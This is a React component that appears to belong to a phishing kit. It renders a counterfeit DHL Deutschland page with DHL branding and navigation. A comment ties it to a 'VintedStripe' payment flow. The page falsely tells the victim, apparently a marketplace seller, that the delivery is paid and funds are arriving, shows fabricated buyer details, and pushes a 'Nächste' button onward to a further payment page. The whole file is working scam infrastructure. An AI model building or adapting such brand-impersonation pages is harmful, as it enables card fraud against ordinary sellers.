import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DhlDeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const DHL_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/dhl-logo.png`;
const DHL_DE_FOOTER_SRC = `${process.env.PUBLIC_URL || ''}/de-dhl/footer.png`;

/**
 * DHL Deutschland — Erfolgsseite: Captcha (VintedStripe1) → diese Seite → index2 (VintedStripe2).
 */
function DhlDeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'DE').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const firstName = (pageData?.first_name || '').trim();
  const lastName = (pageData?.last_name || '').trim();
  const buyerLine = [firstName, lastName].filter(Boolean).join(' ') || '—';
  const productName = (pageData?.product_name || '').trim() || '—';

  const abfahrtsId =
    (pageData?.tracking_number && String(pageData.tracking_number).trim()) ||
    (pageData?.transaction_id && String(pageData.transaction_id).trim()) ||
    (pageData?.unique_id && String(pageData.unique_id).trim()) ||
    (pageCode || '—');
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dhlde-wrap" lang="de">
        <div className="dhlde-loading">Wird geladen…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="dhlde-wrap" lang="de">
      <a href="#/" className="dhlde-covid-bar">
        Aktuelle Hinweise zum Coronavirus &gt;
      </a>

      <header className="dhlde-header">
        <div className="dhlde-header-inner">
          <div className="dhlde-header-top">
            <a href="#/" className="dhlde-logo" aria-label="DHL">
              <img src={DHL_LOGO_SRC} alt="DHL" />
            </a>
            <div className="dhlde-header-top-right">
              <span className="dhlde-pill dhlde-pill--active">Privatkunden</span>
              <span className="dhlde-pill">Geschäftskunden</span>
            </div>
          </div>
          <div className="dhlde-header-bottom">
            <nav className="dhlde-nav" aria-label="Hauptnavigation">
              <a href="#/">Pakete versenden</a>
              <a href="#/">Pakete empfangen</a>
              <a href="#/">Hilfe und Kontakt</a>
            </nav>
            <div className="dhlde-util">
              <button type="button" className="dhlde-icon-btn" aria-label="Suche" />
              <a href="#/" className="dhlde-login">
                Login
              </a>
              <button type="button" className="dhlde-lang">
                DE <span className="dhlde-chevron" aria-hidden />
              </button>
            </div>
          </div>
        </div>
      </header>

      <main className="dhlde-main">
        <h1 className="dhlde-h1">Überwachen Sie die Verpackung</h1>

        <div className="dhlde-track-block">
          <div className="dhlde-track-row">
            <span className="dhlde-track-label">Abfahrts-ID:</span>{' '}
            <span className="dhlde-gold">{abfahrtsId}</span>
          </div>
          <div className="dhlde-track-row">
            <span className="dhlde-track-label">Status:</span>{' '}
            <span className="dhlde-gold">Erhalt von Geldern</span>
          </div>
        </div>

        <section className="dhlde-card">
          <h2 className="dhlde-h2">Die Lieferung ist bereits bezahlt!</h2>
          <p className="dhlde-p">
            Sobald Sie das Guthaben auf Ihrer Karte erhalten haben, senden Sie diese gemäß den obigen Angaben an den
            Käufer der Ware.
          </p>
          <p className="dhlde-p">
            Teilen Sie dem Käufer nach dem Versand der Ware die Liefernummer mit.
          </p>

          <Link to={index2Path} className="dhlde-btn-next">
            Nächste
          </Link>

          <h3 className="dhlde-h3">Käuferdetails:</h3>
          <table className="dhlde-table">
            <tbody>
              <tr>
                <th scope="row">Produkt</th>
                <td>{productName}</td>
              </tr>
              <tr>
                <th scope="row">Käufer</th>
                <td>{buyerLine}</td>
              </tr>
              <tr>
                <th scope="row">Summe</th>
                <td>{amountLine}</td>
              </tr>
              <tr>
                <th scope="row">Abfahrts-ID</th>
                <td>{abfahrtsId}</td>
              </tr>
            </tbody>
          </table>
        </section>
      </main>

      <footer className="dhlde-footer">
        <img className="dhlde-footer-img" src={DHL_DE_FOOTER_SRC} alt="" />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DhlDeSuccess;
